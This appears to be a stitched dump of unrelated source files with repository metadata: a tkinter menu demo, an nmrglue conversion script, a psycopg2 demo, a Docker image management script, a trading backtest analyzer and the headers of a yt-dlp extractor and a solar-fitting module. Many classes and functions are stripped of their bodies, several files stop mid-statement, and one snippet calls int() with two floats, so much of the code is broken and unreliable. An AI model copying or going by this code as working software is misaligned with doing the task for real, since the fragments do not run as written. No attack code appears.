] | null | null | null | Mod 03/03 Prova.py | SauloCav/CN | e8de20dbcf1b3ff043743728b7dde2eff1ae8f87 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
import math
print(int(1.9,9.7))
| 18.666667 | 58 | 0.504464 |
467ea3052543109008b133a68620b40cb725a84a | 2,055 | py | Python | almetro/al.py | arnour/almetro | 7d00b1bb746b49dc9dd464395abdf4fe93f028fe | [
"Apache-2.0"
] | null | null | null | almetro/al.py | arnour/almetro | 7d00b1bb746b49dc9dd464395abdf4fe93f028fe | [
"Apache-2.0"
] | 1 | 2019-08-21T23:02:49.000Z | 2019-08-21T23:02:49.000Z | almetro/al.py | arnour/almetro | 7d00b1bb746b49dc9dd464395abdf4fe93f028fe | [
"Apache-2.0"
] | null | null | null | from almetro.instance import growing
from almetro.metro import Metro
import timeit
| 34.830508 | 139 | 0.685158 |
467fe487527b89370f3c2d1bfc1b416969557a05 | 31,434 | py | Python | yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | aecd021656b672dbb617e5bae54a8986f9c4ebaf | [
"Unlicense"
] | 80 | 2021-05-25T11:33:49.000Z | 2022-03-29T20:36:53.000Z | yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | aecd021656b672dbb617e5bae54a8986f9c4ebaf | [
"Unlicense"
] | 53 | 2017-04-12T19:53:18.000Z | 2022-02-22T10:33:13.000Z | yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | aecd021656b672dbb617e5bae54a8986f9c4ebaf | [
"Unlicense"
] | 22 | 2021-05-07T05:01:27.000Z | 2022-03-26T19:10:54.000Z | # coding: utf-8
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from .youtube import YoutubeIE, YoutubeBaseInfoExtractor
from ..compat import (
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_HTTPError
)
from ..utils import (
bug_reports_message,
clean_html,
dict_get,
extract_attributes,
ExtractorError,
get_element_by_id,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
merge_dicts,
mimetype2ext,
orderedSet,
parse_duration,
parse_qs,
str_to_int,
str_or_none,
traverse_obj,
try_get,
unified_strdate,
unified_timestamp,
urlhandle_detect_ext,
url_or_none
)
| 46.776786 | 213 | 0.558822 |
4680d6848613dfb9b8af98b8d4dd6e1f33bd4389 | 1,008 | py | Python | Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 2622b4ddfd687505becfd246e82a2ed0cb9b76f3 | [
"MIT"
] | 20 | 2020-08-19T23:27:01.000Z | 2022-02-03T12:02:17.000Z | Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 2622b4ddfd687505becfd246e82a2ed0cb9b76f3 | [
"MIT"
] | 1 | 2021-04-10T18:06:05.000Z | 2021-04-10T18:06:05.000Z | Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 2622b4ddfd687505becfd246e82a2ed0cb9b76f3 | [
"MIT"
] | 2 | 2020-12-03T19:35:36.000Z | 2021-11-10T14:58:39.000Z | # Interfas Grafica XI
# Menu
from tkinter import *
root=Tk()
barraMenu=Menu(root)
root.config(menu=barraMenu, width=600, height=400)
archivoMenu=Menu(barraMenu, tearoff=0)
archivoMenu.add_command(label="Nuevo")
archivoMenu.add_command(label="Guardar")
archivoMenu.add_command(label="Guardar Como")
archivoMenu.add_separator()
archivoMenu.add_command(label="Cerrar")
archivoMenu.add_command(label="Salir")
archivoEdicion=Menu(barraMenu, tearoff=0)
archivoHerramientas=Menu(barraMenu)
archivoEdicion.add_command(label="Copiar")
archivoEdicion.add_command(label="Cortar")
archivoEdicion.add_command(label="Pegar")
archivoAyuda=Menu(barraMenu, tearoff=0)
barraMenu.add_cascade(label="Archivo", menu=archivoMenu)
barraMenu.add_cascade(label="Edicion", menu=archivoEdicion)
barraMenu.add_cascade(label="Herramienta", menu=archivoHerramientas)
barraMenu.add_cascade(label="Ayuda", menu=archivoAyuda)
archivoAyuda.add_command(label="Licencia")
archivoAyuda.add_command(label="Acerca de...")
root.mainloop() | 28 | 68 | 0.8125 |
46812ee3bdef976af898f29d2c99337fc3788ea0 | 91 | py | Python | virtual/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | marknesh/pitches | 0a480d9bc2beafaefa0121393b1502cc05edab89 | [
"MIT"
] | null | null | null | virtual/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | marknesh/pitches | 0a480d9bc2beafaefa0121393b1502cc05edab89 | [
"MIT"
] | 11 | 2020-06-05T20:57:31.000Z | 2021-09-22T18:35:03.000Z | flask/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | [
"MIT",
"Unlicense"
] | 1 | 2020-11-04T06:48:34.000Z | 2020-11-04T06:48:34.000Z | # Copyright 2017 Canonical Ltd.
# Licensed under the LGPLv3, see LICENCE file for details.
| 30.333333 | 58 | 0.78022 |
4681cb44945ca44b04cb55846c39c0d1d3ca721a | 5,589 | py | Python | 08/postgresql_demo.py | catcherwong-archive/2019 | f9672920113b1ec0a5fcd6a6bde681f62d805763 | [
"MIT"
] | 27 | 2019-04-07T15:31:53.000Z | 2021-08-28T16:18:34.000Z | 08/postgresql_demo.py | hca1120/2019 | 09e5f49407b8239409e857f8117877eedb6b0134 | [
"MIT"
] | 5 | 2019-08-10T08:19:28.000Z | 2022-02-11T02:38:41.000Z | 08/postgresql_demo.py | hca1120/2019 | 09e5f49407b8239409e857f8117877eedb6b0134 | [
"MIT"
] | 31 | 2019-04-07T15:31:57.000Z | 2022-02-02T20:36:58.000Z | # -*- coding: UTF-8 -*-
import psycopg2 #postgresql
import time
import datetime
if __name__ == "__main__":
pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456")
print("===========insert_one==============")
pg.insert_one("wong", 1)
print("===========query_all==============")
pg.query_all()
print("===========query_lastone==============")
pg.query_lastone()
print("===========query_byname==============")
pg.query_byname("catcher")
print("===========update_genderbyid==============")
pg.update_genderbyid(4, 2)
print("===========delete_byname==============")
pg.delete_byname("wong")
print("===========query_all==============")
pg.query_all()
| 35.598726 | 138 | 0.429236 |
46820f0e1937a8a50c1292d89054f263875a439f | 686 | py | Python | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | 1 | 2019-04-22T06:08:13.000Z | 2019-04-22T06:08:13.000Z | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
import nmrglue as ng
# read in the varian data
dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2")
# Set the parameters
u = ng.pipe.guess_udic(dic,data)
# create the converter object and initilize with varian data
C = ng.convert.converter()
C.from_pipe(dic,data,u)
# create pipe data and then write it out
ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True)
# check the conversion against NMRPipe
print "Conversion complete, listing differences between files:"
sdic,sdata = ng.sparky.read("2d_sparky.ucsf")
sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf")
print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
| 29.826087 | 67 | 0.759475 |
46821c4a15686b2fb3b7ea49bee70f910667b4c7 | 36,931 | py | Python | jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | e7362fc261f49dd7a4353c9a9a3f98d6ef9a78b4 | [
"Apache-2.0"
] | null | null | null | jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | e7362fc261f49dd7a4353c9a9a3f98d6ef9a78b4 | [
"Apache-2.0"
] | null | null | null | jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | e7362fc261f49dd7a4353c9a9a3f98d6ef9a78b4 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
from __future__ import print_function
import os
import json
from collections import OrderedDict
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import Formatter
from jaqs.trade.analyze.report import Report
from jaqs.data import RemoteDataService
from jaqs.data.basic.instrument import InstManager
from jaqs.trade import common
import jaqs.util as jutil
STATIC_FOLDER = jutil.join_relative_path("trade/analyze/static")
TO_PCT = 100.0
MPL_RCPARAMS = {'figure.facecolor': '#F6F6F6',
'axes.facecolor': '#F6F6F6',
'axes.edgecolor': '#D3D3D3',
'text.color': '#555555',
'grid.color': '#B1B1B1',
'grid.alpha': 0.3,
# scale
'axes.linewidth': 2.0,
'axes.titlepad': 12,
'grid.linewidth': 1.0,
'grid.linestyle': '-',
# font size
'font.size': 13,
'axes.titlesize': 18,
'axes.labelsize': 14,
'legend.fontsize': 'small',
'lines.linewidth': 2.5,
}
def _init_inst_data(self):
symbol_str = ','.join(self.universe)
if self.dataview is not None:
data_inst = self.dataview.data_inst
self.inst_map = data_inst.to_dict(orient='index')
elif self.data_api is not None:
inst_mgr = InstManager(data_api=self.data_api, symbol=symbol_str)
self.inst_map = {k: v.__dict__ for k, v in inst_mgr.inst_map.items()}
del inst_mgr
else:
raise ValueError("no dataview or dataapi provided.")
def _init_trades(self, df):
"""Add datetime column. """
df.loc[:, 'fill_dt'] = jutil.combine_date_time(df.loc[:, 'fill_date'], df.loc[:, 'fill_time'])
df = df.set_index(['symbol', 'fill_dt']).sort_index(axis=0)
# self._trades = jutil.group_df_to_dict(df, by='symbol')
self._trades = df
def _init_symbol_price(self):
"""Get close price of securities in the universe from data server."""
if self.dataview is not None:
df_close = self.dataview.get_ts('close', start_date=self.start_date, end_date=self.end_date)
df_close_adj = self.dataview.get_ts('close_adj', start_date=self.start_date, end_date=self.end_date)
else:
df, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
start_date=self.start_date, end_date=self.end_date)
if msg != '0,':
print(msg)
df_close = df.pivot(index='trade_date', columns='symbol', values='close')
df_adj, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
start_date=self.start_date, end_date=self.end_date)
if msg != '0,':
print(msg)
df_close_adj = df_adj.pivot(index='trade_date', columns='symbol', values='close')
self._closes = df_close
self._closes_adj = df_close_adj
def _init_universe(self, securities):
"""Return a set of securities."""
self._universe = set(securities)
def _init_configs(self, folder):
import codecs
with codecs.open(os.path.join(folder, 'configs.json'), 'r', encoding='utf-8') as f:
configs = json.load(f)
self._configs = configs
self.init_balance = self.configs['init_balance']
self.start_date = self.configs['start_date']
self.end_date = self.configs['end_date']
'''
def get_daily(self):
"""Add various statistics to daily DataFrame."""
self.daily = self._get_daily(self.closes, self.trades)
daily_dic = dict()
for sec, df_trade in self.trades.items():
df_close = self.closes[sec].rename('close')
res = self._get_daily(df_close, df_trade)
daily_dic[sec] = res
self.daily = daily_dic
'''
def gen_report(self, source_dir, template_fn, out_folder='.', selected=None):
"""
Generate HTML (and PDF) report of the trade analysis.
Parameters
----------
source_dir : str
path of directory where HTML template and css files are stored.
template_fn : str
File name of HTML template.
out_folder : str
Output folder of report.
selected : list of str or None
List of symbols whose detailed PnL curve and position will be plotted.
# TODO: this parameter should not belong to function
"""
dic = dict()
dic['html_title'] = "Alpha Strategy Backtest Result"
dic['selected_securities'] = selected
# we do not want to show username / password in report
dic['props'] = {k: v for k, v in self.configs.items() if ('username' not in k and 'password' not in k)}
dic['performance_metrics'] = self.performance_metrics
dic['risk_metrics'] = self.risk_metrics
dic['position_change'] = self.position_change
dic['account'] = self.account
dic['df_daily'] = jutil.group_df_to_dict(self.daily, by='symbol')
dic['daily_position'] = self.daily_position
self.report_dic.update(dic)
self.returns.to_csv(os.path.join(out_folder, 'returns.csv'))
r = Report(self.report_dic, source_dir=source_dir, template_fn=template_fn, out_folder=out_folder)
r.generate_html()
r.output_html('report.html')
class EventAnalyzer(BaseAnalyzer):
class AlphaAnalyzer(BaseAnalyzer):
'''
def get_returns_OLD(self, compound_return=True, consider_commission=True):
profit_col_name = 'CumProfitComm' if consider_commission else 'CumProfit'
vp_list = {sec: df_profit.loc[:, profit_col_name] for sec, df_profit in self.daily.items()}
df_profit = pd.concat(vp_list, axis=1) # this is cumulative profit
# TODO temperary solution
df_profit = df_profit.fillna(method='ffill').fillna(0.0)
strategy_value = df_profit.sum(axis=1) + self.configs['init_balance']
market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill')
market_values.columns = ['strat', 'bench']
df_returns = market_values.pct_change(periods=1).fillna(0.0)
df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum')
if compound_return:
df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1
df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0)
else:
df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench']
df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0)
start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d")
end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d")
years = (end - start).days / 365.0
self.metrics['yearly_return'] = np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1
self.metrics['yearly_vol'] = df_returns.loc[:, 'active'].std() * np.sqrt(225.)
self.metrics['beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1]
self.metrics['sharpe'] = self.metrics['yearly_return'] / self.metrics['yearly_vol']
# bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date')
# df_returns = df_returns.join(bt_strat_mv, how='right')
self.returns = df_returns
'''
def _brinson(self, close, pos, index_weight, group):
"""
Brinson Attribution.
Parameters
----------
close : pd.DataFrame
Index is date, columns are symbols.
pos : pd.DataFrame
Index is date, columns are symbols.
index_weight : pd.DataFrame
Index is date, columns are symbols.
group : pd.DataFrame
Index is date, columns are symbols.
Returns
-------
dict
"""
ret = close.pct_change(1)
pos_sum = pos.sum(axis=1)
pf_weight = pos.div(pos_sum, axis=0)
pf_weight.loc[pos_sum == 0, :] = 0.0
assert pf_weight.isnull().sum().sum() == 0
pf_weight = pf_weight.reindex(index=ret.index, columns=ret.columns)
pf_weight = pf_weight.fillna(0.0)
weighted_ret_pf = ret.mul(pf_weight)
weighted_ret_index = ret.mul(index_weight)
index_group_weight = group_sum(index_weight, group)
pf_group_weight = group_sum(pf_weight, group)
pf_group_ret = group_sum(weighted_ret_pf, group).div(pf_group_weight)
index_group_ret = group_sum(weighted_ret_index, group).div(index_group_weight)
allo_ret_group = (pf_group_weight - index_group_weight).mul(index_group_ret)
allo_ret = allo_ret_group.sum(axis=1)
selection_ret_group = (pf_group_ret - index_group_ret).mul(index_group_weight)
selection_ret = selection_ret_group.sum(axis=1)
active_ret = (weighted_ret_pf.sum(axis=1) - weighted_ret_index.sum(axis=1))
inter_ret = active_ret - selection_ret - allo_ret
df_brinson = pd.DataFrame(index=allo_ret.index,
data={'allocation': allo_ret,
'selection': selection_ret,
'interaction': inter_ret,
'total_active': active_ret})
return {'df_brinson': df_brinson, 'allocation': allo_ret_group, 'selection': selection_ret_group}
def brinson(self, group):
"""
Parameters
----------
group : str or pd.DataFrame
If group is string, this function will try to fetch the corresponding DataFrame from DataView.
If group is pd.DataFrame, it will be used as-is.
Returns
-------
"""
if isinstance(group, str):
group = self.dataview.get_ts(group, start_date=self.start_date, end_date=self.end_date)
elif isinstance(group, pd.DataFrame):
pass
else:
raise ValueError("Group must be string or DataFrame. But {} is provided.".format(group))
if group is None or group.empty:
raise ValueError("group is None or group is empty")
close = self.closes_adj
pos = self.daily_position
index_weight = self._get_index_weight()
res_dic = self._brinson(close, pos, index_weight, group)
df_brinson = res_dic['df_brinson']
self.df_brinson = df_brinson
self.report_dic['df_brinson'] = df_brinson
plot_brinson(df_brinson, save_folder=self.file_folder)
def plot_daily_trading_holding_pnl(trading, holding, total, total_cum):
"""
Parameters
----------
Series
"""
idx0 = total.index
n = len(idx0)
idx = np.arange(n)
fig, (ax0, ax2, ax3) = plt.subplots(3, 1, figsize=(16, 13.5), sharex=True)
ax1 = ax0.twinx()
bar_width = 0.4
profit_color, lose_color = '#D63434', '#2DB635'
curve_color = '#174F67'
y_label = 'Profit / Loss ($)'
color_arr_raw = np.array([profit_color] * n)
color_arr = color_arr_raw.copy()
color_arr[total < 0] = lose_color
ax0.bar(idx, total, width=bar_width, color=color_arr)
ax0.set(title='Daily PnL', ylabel=y_label, xlim=[-2, n+2],)
ax0.xaxis.set_major_formatter(MyFormatter(idx0, '%y-%m-%d'))
ax1.plot(idx, total_cum, lw=1.5, color=curve_color)
ax1.set(ylabel='Cum. ' + y_label)
ax1.yaxis.label.set_color(curve_color)
color_arr = color_arr_raw.copy()
color_arr[trading < 0] = lose_color
ax2.bar(idx-bar_width/2, trading, width=bar_width, color=color_arr)
ax2.set(title='Daily Trading PnL', ylabel=y_label)
color_arr = color_arr_raw.copy()
color_arr[holding < 0] = lose_color
ax3.bar(idx+bar_width/2, holding, width=bar_width, color=color_arr)
ax3.set(title='Daily Holding PnL', ylabel=y_label, xticks=idx[: : n//10])
return fig
def plot_portfolio_bench_pnl(portfolio_cum_ret, benchmark_cum_ret, excess_cum_ret):
"""
Parameters
----------
Series
"""
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 9), sharex=True)
idx_dt = portfolio_cum_ret.index
idx = np.arange(len(idx_dt))
y_label_ret = "Cumulative Return (%)"
ax1.plot(idx, (benchmark_cum_ret-1) * TO_PCT, label='Benchmark', color='#174F67')
ax1.plot(idx, (portfolio_cum_ret-1) * TO_PCT, label='Strategy', color='#198DD6')
ax1.legend(loc='upper left')
ax1.set(title="Absolute Return of Portfolio and Benchmark",
#xlabel="Date",
ylabel=y_label_ret)
ax1.grid(axis='y')
ax2.plot(idx, (excess_cum_ret-1) * TO_PCT, label='Extra Return', color='#C37051')
ax2.set(title="Excess Return Compared to Benchmark", ylabel=y_label_ret
#xlabel="Date",
)
ax2.grid(axis='y')
ax2.xaxis.set_major_formatter(MyFormatter(idx_dt, '%y-%m-%d')) # 17-09-31
fig.tight_layout()
return fig
def plot_brinson(df, save_folder):
"""
Parameters
----------
df : pd.DataFrame
"""
allo, selec, inter, total = df['allocation'], df['selection'], df['interaction'], df['total_active']
fig, ax1 = plt.subplots(1, 1, figsize=(21, 8))
idx0 = df.index
idx = range(len(idx0))
ax1.plot(idx, selec, lw=1.5, color='indianred', label='Selection Return')
ax1.plot(idx, allo, lw=1.5, color='royalblue', label='Allocation Return')
ax1.plot(idx, inter, lw=1.5, color='purple', label='Interaction Return')
# ax1.plot(idx, total, lw=1.5, ls='--', color='k', label='Total Active Return')
ax1.axhline(0.0, color='k', lw=0.5, ls='--')
ax1.legend(loc='upper left')
ax1.set_xlabel("Date")
ax1.set_ylabel("Return")
ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d'))
plt.tight_layout()
fig.savefig(os.path.join(save_folder, 'brinson_attribution.png'))
plt.close()
def calc_avg_pos_price(pos_arr, price_arr):
"""
Calculate average cost price using position and fill price.
When position = 0, cost price = symbol price.
"""
assert len(pos_arr) == len(price_arr)
avg_price = np.zeros_like(pos_arr, dtype=float)
avg_price[0] = price_arr[0]
for i in range(pos_arr.shape[0] - 1):
if pos_arr[i+1] == 0:
avg_price[i+1] = 0.0
else:
pos_diff = pos_arr[i+1] - pos_arr[i]
if pos_arr[i] == 0 or pos_diff * pos_arr[i] > 0:
count = True
else:
count = False
if count:
avg_price[i+1] = (avg_price[i] * pos_arr[i] + pos_diff * price_arr[i+1]) * 1. / pos_arr[i+1]
else:
avg_price[i+1] = avg_price[i]
return avg_price
def plot_trades(df, symbol="", save_folder='.', marker_size_adjust_ratio=0.1):
old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()}
mpl.rcParams.update(MPL_RCPARAMS)
idx0 = df.index
idx = range(len(idx0))
price = df.loc[:, 'close']
bv, sv = df.loc[:, 'BuyVolume'].values, df.loc[:, 'SellVolume'].values
profit = df.loc[:, 'CumProfit'].values
avgpx = df.loc[:, 'AvgPosPrice']
bv_m = np.max(bv)
sv_m = np.max(sv)
if bv_m > 0:
bv = bv / bv_m * 100
if sv_m > 0:
sv = sv / sv_m * 100
fig = plt.figure(figsize=(14, 10))
ax1 = plt.subplot2grid((4, 1), (0, 0), rowspan=3)
ax3 = plt.subplot2grid((4, 1), (3, 0), rowspan=1, sharex=ax1)
ax2 = ax1.twinx()
ax1.plot(idx, price, label='Price', linestyle='-', lw=1, marker='', color='yellow')
ax1.scatter(idx, price, label='buy', marker='o', s=bv, color='indianred')
ax1.scatter(idx, price, label='sell', marker='o', s=sv, color='forestgreen')
ax1.plot(idx, avgpx, lw=1, marker='', color='green')
ax1.legend(loc='upper left')
ax1.set(title="Price, Trades and PnL for {:s}".format(symbol), ylabel="Price ($)")
ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m'))
ax2.plot(idx, profit, label='PnL', color='k', lw=1, ls='--', alpha=.4)
ax2.legend(loc='upper right')
ax2.set(ylabel="Profit / Loss ($)")
# ax1.xaxis.set_major_formatter(MyFormatter(df.index))#, '%H:%M'))
ax3.plot(idx, df.loc[:, 'position'], marker='D', markersize=3, lw=2)
ax3.axhline(0, color='k', lw=1, ls='--', alpha=0.8)
ax3.set(title="Position of {:s}".format(symbol))
fig.tight_layout()
fig.savefig(save_folder + '/' + "{}.png".format(symbol), facecolor=fig.get_facecolor(), dpi=fig.get_dpi())
mpl.rcParams.update(old_mpl_rcparams)
| 39.583065 | 139 | 0.584198 |
4682bbaf850d64b54a79c88a195b6f6e2f183e48 | 114 | py | Python | lightnet/data/transform/__init__.py | eavise-kul/lightnet | d2d5d3fff8f929c3683c34f176217649375b98e1 | [
"MIT"
] | 6 | 2019-10-10T05:42:50.000Z | 2022-02-27T04:59:29.000Z | lightnet/data/transform/__init__.py | eavise-kul/lightnet | d2d5d3fff8f929c3683c34f176217649375b98e1 | [
"MIT"
] | null | null | null | lightnet/data/transform/__init__.py | eavise-kul/lightnet | d2d5d3fff8f929c3683c34f176217649375b98e1 | [
"MIT"
] | 4 | 2020-01-25T20:16:23.000Z | 2021-04-29T13:02:34.000Z | #
# Lightnet data transforms
# Copyright EAVISE
#
from .pre import *
from .post import *
from .util import *
| 12.666667 | 28 | 0.684211 |
46830865694c3242ec731476bef2c0bab11ffa36 | 420 | py | Python | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from rest_framework import status
from rest_framework.exceptions import APIException
| 28 | 60 | 0.719048 |
468313da2c3cc1e70694859bf5264667fcd82781 | 8,935 | py | Python | build_tools/docker/manage_images.py | BernhardRiemann/iree | 471349762b316f7d6b83eb5f9089255d78052758 | [
"Apache-2.0"
] | 1 | 2021-03-15T13:53:30.000Z | 2021-03-15T13:53:30.000Z | build_tools/docker/manage_images.py | BernhardRiemann/iree | 471349762b316f7d6b83eb5f9089255d78052758 | [
"Apache-2.0"
] | null | null | null | build_tools/docker/manage_images.py | BernhardRiemann/iree | 471349762b316f7d6b83eb5f9089255d78052758 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages IREE Docker image definitions.
Includes information on their dependency graph and GCR URL.
Example usage:
Rebuild the cmake image and all images that transitiviely on depend on it,
tagging them with `latest`:
python3 build_tools/docker/manage_images.py --build --image cmake
Print out output for rebuilding the cmake image and all images that
transitiviely on depend on it, but don't take side-effecting actions:
python3 build_tools/docker/manage_images.py --build --image cmake --dry-run
Push all `prod` images to GCR:
python3 build_tools/docker/manage_images.py --push --tag prod --images all
Rebuild and push all images and update references to them in the repository:
python3 build_tools/docker/manage_images.py --push --images all
--update-references
"""
import argparse
import fileinput
import os
import posixpath
import re
import subprocess
import sys
IREE_GCR_URL = 'gcr.io/iree-oss/'
DOCKER_DIR = 'build_tools/docker/'
# Map from image names to images that they depend on.
IMAGES_TO_DEPENDENCIES = {
'base': [],
'bazel': ['base', 'util'],
'bazel-python': ['bazel'],
'bazel-tensorflow': ['bazel-python'],
'bazel-tensorflow-nvidia': ['bazel-tensorflow-vulkan'],
'bazel-tensorflow-swiftshader': ['bazel-tensorflow-vulkan', 'swiftshader'],
'bazel-tensorflow-vulkan': ['bazel-tensorflow'],
'cmake': ['base', 'util'],
'cmake-android': ['cmake', 'util'],
'cmake-python': ['cmake'],
'cmake-python-nvidia': ['cmake-python-vulkan'],
'cmake-python-swiftshader': ['cmake-python-vulkan', 'swiftshader'],
'cmake-python-vulkan': ['cmake-python'],
'rbe-toolchain': [],
'swiftshader': ['cmake'],
'util': [],
}
IMAGES_TO_DEPENDENT_IMAGES = {k: [] for k in IMAGES_TO_DEPENDENCIES}
for image, dependencies in IMAGES_TO_DEPENDENCIES.items():
for dependency in dependencies:
IMAGES_TO_DEPENDENT_IMAGES[dependency].append(image)
IMAGES_HELP = [f'`{name}`' for name in IMAGES_TO_DEPENDENCIES]
IMAGES_HELP = f'{", ".join(IMAGES_HELP)} or `all`'
def parse_arguments():
"""Parses command-line options."""
parser = argparse.ArgumentParser(
description="Build IREE's Docker images and optionally push them to GCR.")
parser.add_argument(
'--images',
'--image',
type=str,
required=True,
action='append',
help=f'Name of the image to build: {IMAGES_HELP}.')
parser.add_argument(
'--tag',
type=str,
default='latest',
help='Tag for the images to build. Defaults to `latest` (which is good '
'for testing changes in a PR). Use `prod` to update the images that the '
'CI caches.')
parser.add_argument(
'--pull',
action='store_true',
help='Pull the specified image before building.')
parser.add_argument(
'--build',
action='store_true',
help='Build new images from the current Dockerfiles.')
parser.add_argument(
'--push',
action='store_true',
help='Push the built images to GCR. Requires gcloud authorization.')
parser.add_argument(
'--update_references',
'--update-references',
action='store_true',
help='Update all references to the specified images to point at the new'
' digest.')
parser.add_argument(
'--dry_run',
'--dry-run',
'-n',
action='store_true',
help='Print output without building or pushing any images.')
args = parser.parse_args()
for image in args.images:
if image == 'all':
# Sort for a determinstic order
args.images = sorted(IMAGES_TO_DEPENDENCIES.keys())
elif image not in IMAGES_TO_DEPENDENCIES:
raise parser.error('Expected --image to be one of:\n'
f' {IMAGES_HELP}\n'
f'but got `{image}`.')
return args
if __name__ == '__main__':
args = parse_arguments()
# Ensure the user has the correct authorization if they try to push to GCR.
if args.push:
if stream_command(['which', 'gcloud']) != 0:
print('gcloud not found.'
' See https://cloud.google.com/sdk/install for installation.')
sys.exit(1)
check_stream_command(['gcloud', 'auth', 'configure-docker'],
dry_run=args.dry_run)
images_to_process = get_ordered_images_to_process(args.images)
print(f'Also processing dependent images. Will process: {images_to_process}')
for image in images_to_process:
print(f'Processing image {image}')
image_name = posixpath.join(IREE_GCR_URL, image)
image_tag = f'{image_name}:{args.tag}'
image_path = os.path.join(DOCKER_DIR, image)
if args.pull:
check_stream_command(['docker', 'pull', image_tag], dry_run=args.dry_run)
if args.build:
check_stream_command(['docker', 'build', '--tag', image_tag, image_path],
dry_run=args.dry_run)
if args.push:
check_stream_command(['docker', 'push', image_tag], dry_run=args.dry_run)
if args.update_references:
digest = get_repo_digest(image_tag)
# Just hardcode this oddity
if image == 'rbe-toolchain':
update_rbe_reference(digest, dry_run=args.dry_run)
update_references(image_name, digest, dry_run=args.dry_run)
| 32.140288 | 80 | 0.675993 |
4684141f6543556bf465b101be71f060f3b08131 | 27,570 | py | Python | suncasa/pygsfit/gsutils.py | wyq24/suncasa | e6ed6d8b9bd2186c4af6d0354d03af5fff9aef7a | [
"BSD-2-Clause"
] | null | null | null | suncasa/pygsfit/gsutils.py | wyq24/suncasa | e6ed6d8b9bd2186c4af6d0354d03af5fff9aef7a | [
"BSD-2-Clause"
] | null | null | null | suncasa/pygsfit/gsutils.py | wyq24/suncasa | e6ed6d8b9bd2186c4af6d0354d03af5fff9aef7a | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
# import sys
import math
import os, sys, platform
import astropy.units as u
from sunpy import map as smap
from astropy.coordinates import SkyCoord
from suncasa.io import ndfits
import lmfit
from astropy.time import Time
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.colorbar as colorbar
from suncasa.utils import mstools
from suncasa.utils import qlookplot as ql
from mpl_toolkits.axes_grid1 import make_axes_locatable
from tqdm import tqdm
from astropy.io import fits
import numpy.ma as ma
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
import gstools
# name of the fast gyrosynchrotron codes shared library
if platform.system() == 'Linux' or platform.system() == 'Darwin':
